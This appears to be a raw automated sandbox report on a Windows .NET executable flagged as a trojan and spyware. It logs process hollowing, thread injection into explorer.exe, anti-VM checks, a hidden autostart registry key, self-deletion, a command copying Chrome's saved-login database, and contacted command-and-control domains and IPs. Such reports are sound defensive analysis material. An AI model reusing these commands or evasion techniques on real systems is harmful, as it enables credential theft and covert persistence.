Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Code function: 0_2_0121C784	0_2_0121C784
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Code function: 0_2_012169E0	0_2_012169E0
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Code function: 0_2_01216A58	0_2_01216A58
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Code function: 0_2_0121ED88	0_2_0121ED88
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Code function: 0_2_0121ED98	0_2_0121ED98
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Code function: 3_2_00401030	3_2_00401030
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Code function: 3_2_0041E8A0	3_2_0041E8A0
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Code function: 3_2_00409290	3_2_00409290
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Code function: 3_2_0041EB0C	3_2_0041EB0C
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Code function: 3_2_0041DC40	3_2_0041DC40
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Code function: 3_2_0040DC80	3_2_0040DC80
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Code function: 3_2_00402D87	3_2_00402D87
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Code function: 3_2_00402D90	3_2_00402D90
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Code function: 3_2_00402FB0	3_2_00402FB0
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Code function: 3_2_004B2050	3_2_004B2050

Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Code function: 3_2_0041A3C0 NtCreateFile,	3_2_0041A3C0
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Code function: 3_2_0041A470 NtReadFile,	3_2_0041A470
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Code function: 3_2_0041A4F0 NtClose,	3_2_0041A4F0
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Code function: 3_2_0041A5A0 NtAllocateVirtualMemory,	3_2_0041A5A0
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Code function: 3_2_0041A3BB NtCreateFile,	3_2_0041A3BB
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Code function: 3_2_0041A46B NtReadFile,	3_2_0041A46B
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Code function: 3_2_0041A4EA NtClose,	3_2_0041A4EA
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Code function: 3_2_0041A59A NtAllocateVirtualMemory,	3_2_0041A59A

Source: e6o7hKFmfC.exe	Binary or memory string: OriginalFilename vs e6o7hKFmfC.exe
Source: e6o7hKFmfC.exe, 00000000.00000002.459110568.00000000012C0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs e6o7hKFmfC.exe
Source: e6o7hKFmfC.exe, 00000000.00000002.468189031.00000000076F0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTweenEngineAPI.dllD vs e6o7hKFmfC.exe
Source: e6o7hKFmfC.exe, 00000000.00000002.465620003.0000000003F69000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTweenEngineAPI.dllD vs e6o7hKFmfC.exe
Source: e6o7hKFmfC.exe, 00000000.00000002.464651183.0000000002F9E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameArgIt.dll4 vs e6o7hKFmfC.exe
Source: e6o7hKFmfC.exe	Binary or memory string: OriginalFilename vs e6o7hKFmfC.exe
Source: e6o7hKFmfC.exe, 00000003.00000002.527904076.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCMMON32.exe` vs e6o7hKFmfC.exe
Source: e6o7hKFmfC.exe, 00000003.00000002.528306755.00000000011DF000.00000040.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs e6o7hKFmfC.exe
Source: e6o7hKFmfC.exe, 00000003.00000002.528089718.000000000104F000.00000040.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs e6o7hKFmfC.exe
Source: e6o7hKFmfC.exe, 00000003.00000003.461362384.0000000000EAE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs e6o7hKFmfC.exe
Source: e6o7hKFmfC.exe, 00000003.00000002.527881557.0000000000C8A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCMMON32.exe` vs e6o7hKFmfC.exe
Source: e6o7hKFmfC.exe, 00000003.00000002.527847860.0000000000C39000.00000040.10000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameCMMON32.exe` vs e6o7hKFmfC.exe
Source: e6o7hKFmfC.exe, 00000003.00000003.455798942.0000000000BD6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs e6o7hKFmfC.exe
Source: e6o7hKFmfC.exe	Binary or memory string: OriginalFilenameDESCUN.exe: vs e6o7hKFmfC.exe

Source: e6o7hKFmfC.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: e6o7hKFmfC.exe

Virustotal: Detection: 20%

Source: e6o7hKFmfC.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\e6o7hKFmfC.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: unknown	Process created: C:\Users\user\Desktop\e6o7hKFmfC.exe "C:\Users\user\Desktop\e6o7hKFmfC.exe"
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Process created: C:\Users\user\Desktop\e6o7hKFmfC.exe C:\Users\user\Desktop\e6o7hKFmfC.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe
Source: C:\Windows\SysWOW64\cmmon32.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\e6o7hKFmfC.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmmon32.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Process created: C:\Users\user\Desktop\e6o7hKFmfC.exe C:\Users\user\Desktop\e6o7hKFmfC.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\e6o7hKFmfC.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V	Jump to behavior

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{317D06E8-5F24-433D-BDF7-79CE68D8ABC2}\InProcServer32

Source: C:\Users\user\Desktop\e6o7hKFmfC.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\e6o7hKFmfC.exe.log

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Local\Temp\DB1

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@10/2@7/6

Source: e6o7hKFmfC.exe	Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll			Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4908:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6688:120:WilError_01

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: C:\Users\user\Desktop\e6o7hKFmfC.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: C:\Windows\SysWOW64\cmmon32.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

.NET source code contains potential unpacker

Source: e6o7hKFmfC.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: e6o7hKFmfC.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: cmmon32.pdb source: e6o7hKFmfC.exe, 00000003.00000002.527834335.0000000000C30000.00000040.10000000.00040000.00000000.sdmp, e6o7hKFmfC.exe, 00000003.00000002.527881557.0000000000C8A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: cmmon32.pdbGCTL source: e6o7hKFmfC.exe, 00000003.00000002.527834335.0000000000C30000.00000040.10000000.00040000.00000000.sdmp, e6o7hKFmfC.exe, 00000003.00000002.527881557.0000000000C8A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: e6o7hKFmfC.exe, 00000003.00000002.528089718.000000000104F000.00000040.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000003.00000002.527924593.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000003.00000003.455627163.0000000000AC0000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000003.00000003.458113426.0000000000D8F000.00000004.00000800.00020000.00000000.sdmp, cmmon32.exe, 0000000B.00000002.705432142.000000000453F000.00000040.00000800.00020000.00000000.sdmp, cmmon32.exe, 0000000B.00000003.529190263.0000000004286000.00000004.00000800.00020000.00000000.sdmp, cmmon32.exe, 0000000B.00000002.704982453.0000000004420000.00000040.00000800.00020000.00000000.sdmp, cmmon32.exe, 0000000B.00000003.527621259.00000000040C3000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: e6o7hKFmfC.exe, 00000003.00000002.528089718.000000000104F000.00000040.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000003.00000002.527924593.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000003.00000003.455627163.0000000000AC0000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000003.00000003.458113426.0000000000D8F000.00000004.00000800.00020000.00000000.sdmp, cmmon32.exe, 0000000B.00000002.705432142.000000000453F000.00000040.00000800.00020000.00000000.sdmp, cmmon32.exe, 0000000B.00000003.529190263.0000000004286000.00000004.00000800.00020000.00000000.sdmp, cmmon32.exe, 0000000B.00000002.704982453.0000000004420000.00000040.00000800.00020000.00000000.sdmp, cmmon32.exe, 0000000B.00000003.527621259.00000000040C3000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

Source: e6o7hKFmfC.exe, ShuffleGame/Form1.cs	.Net Code: THAI04 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 0.2.e6o7hKFmfC.exe.b90000.0.unpack, ShuffleGame/Form1.cs	.Net Code: THAI04 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 0.0.e6o7hKFmfC.exe.b90000.0.unpack, ShuffleGame/Form1.cs	.Net Code: THAI04 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 3.0.e6o7hKFmfC.exe.4b0000.2.unpack, ShuffleGame/Form1.cs	.Net Code: THAI04 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 3.2.e6o7hKFmfC.exe.4b0000.1.unpack, ShuffleGame/Form1.cs	.Net Code: THAI04 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 3.0.e6o7hKFmfC.exe.4b0000.5.unpack, ShuffleGame/Form1.cs	.Net Code: THAI04 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 3.0.e6o7hKFmfC.exe.4b0000.0.unpack, ShuffleGame/Form1.cs	.Net Code: THAI04 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 3.0.e6o7hKFmfC.exe.4b0000.9.unpack, ShuffleGame/Form1.cs	.Net Code: THAI04 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 3.0.e6o7hKFmfC.exe.4b0000.7.unpack, ShuffleGame/Form1.cs	.Net Code: THAI04 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 3.0.e6o7hKFmfC.exe.4b0000.1.unpack, ShuffleGame/Form1.cs	.Net Code: THAI04 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 3.0.e6o7hKFmfC.exe.4b0000.3.unpack, ShuffleGame/Form1.cs	.Net Code: THAI04 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])

Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Code function: 0_2_0121D9E2 pushfd ; retf	0_2_0121D9E9
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Code function: 3_2_0041B0F6 push edx; ret	3_2_0041B0FF
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Code function: 3_2_0041E8A0 push 2E33947Ah; ret	3_2_0041EB0B
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Code function: 3_2_00417273 push ebp; retf	3_2_00417277
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Code function: 3_2_00406B0B push esp; iretd	3_2_00406B3B
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Code function: 3_2_0041EB0C push 2E33947Ah; ret	3_2_0041EB0B
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Code function: 3_2_00417C84 push es; iretd	3_2_00417C85
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Code function: 3_2_00417D68 push edi; retf	3_2_00417D82
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Code function: 3_2_0041D6F5 push eax; ret	3_2_0041D748
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Code function: 3_2_0041D742 push eax; ret	3_2_0041D748
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Code function: 3_2_0041D74B push eax; ret	3_2_0041D7B2
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Code function: 3_2_0041D7AC push eax; ret	3_2_0041D7B2

Source: initial sample

Static PE information: section name: .text entropy: 7.945706696935657

Boot Survival

Creates an undocumented autostart registry key

Source: C:\Windows\SysWOW64\cmmon32.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run 9R1D2

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: 0.2.e6o7hKFmfC.exe.2fb56d4.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.463968432.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.464651183.0000000002F9E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: e6o7hKFmfC.exe PID: 7104, type: MEMORYSTR

Source: e6o7hKFmfC.exe, 00000000.00000002.463968432.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000002.464651183.0000000002F9E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL
Source: e6o7hKFmfC.exe, 00000000.00000002.463968432.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000000.00000002.464651183.0000000002F9E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	RDTSC instruction interceptor: First address: 0000000000408C14 second address: 0000000000408C1A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	RDTSC instruction interceptor: First address: 0000000000408FAE second address: 0000000000408FB4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmmon32.exe	RDTSC instruction interceptor: First address: 00000000026D8C14 second address: 00000000026D8C1A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmmon32.exe	RDTSC instruction interceptor: First address: 00000000026D8FAE second address: 00000000026D8FB4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\e6o7hKFmfC.exe TID: 7108	Thread sleep time: -41263s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe TID: 7140	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe TID: 6724	Thread sleep time: -32000s >= -30000s	Jump to behavior

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\e6o7hKFmfC.exe

Code function: 3_2_00408EE0 rdtsc

3_2_00408EE0

Source: C:\Users\user\Desktop\e6o7hKFmfC.exe

Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\e6o7hKFmfC.exe

Process information queried: ProcessInformation

Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Thread delayed: delay time: 41263			Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: explorer.exe, 00000006.00000000.510520375.0000000007EF6000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000006.00000000.511074066.000000000807B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}8Ll/
Source: e6o7hKFmfC.exe, 00000000.00000002.464651183.0000000002F9E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000006.00000000.511074066.000000000807B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: e6o7hKFmfC.exe, 00000000.00000002.464651183.0000000002F9E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware
Source: explorer.exe, 00000006.00000000.510520375.0000000007EF6000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000006.00000000.505874548.0000000006900000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.511074066.000000000807B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: e6o7hKFmfC.exe, 00000000.00000002.464651183.0000000002F9E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware SVGA II
Source: explorer.exe, 00000006.00000000.510520375.0000000007EF6000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: e6o7hKFmfC.exe, 00000000.00000002.464651183.0000000002F9E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools

Source: C:\Users\user\Desktop\e6o7hKFmfC.exe

Code function: 3_2_00408EE0 rdtsc

3_2_00408EE0

Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\e6o7hKFmfC.exe

Code function: 3_2_0040A150 LdrLoadDll,

3_2_0040A150

Source: C:\Users\user\Desktop\e6o7hKFmfC.exe

Memory allocated: page read and write | page guard

System process connects to network (likely due to code injection or exploit)

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\explorer.exe	Network Connect: 213.186.33.5 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 199.192.23.166 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.duckholland.com
Source: C:\Windows\explorer.exe	Network Connect: 101.36.112.119 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.homesteaddesignstudio.net
Source: C:\Windows\explorer.exe	Domain query: www.xjyjjy.com
Source: C:\Windows\explorer.exe	Network Connect: 188.114.96.6 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.astrofrance.online
Source: C:\Windows\explorer.exe	Domain query: www.timinis23.com
Source: C:\Windows\explorer.exe	Network Connect: 154.94.246.226 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.domainedelapoujade.info

Sample uses process hollowing technique

Source: C:\Users\user\Desktop\e6o7hKFmfC.exe

Section unmapped: C:\Windows\SysWOW64\cmmon32.exe base address: 200000

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Section loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Section loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Users\user\Desktop\e6o7hKFmfC.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Thread register set: target process: 684			Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe	Thread register set: target process: 684			Jump to behavior

Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Process created: C:\Users\user\Desktop\e6o7hKFmfC.exe C:\Users\user\Desktop\e6o7hKFmfC.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\e6o7hKFmfC.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V	Jump to behavior

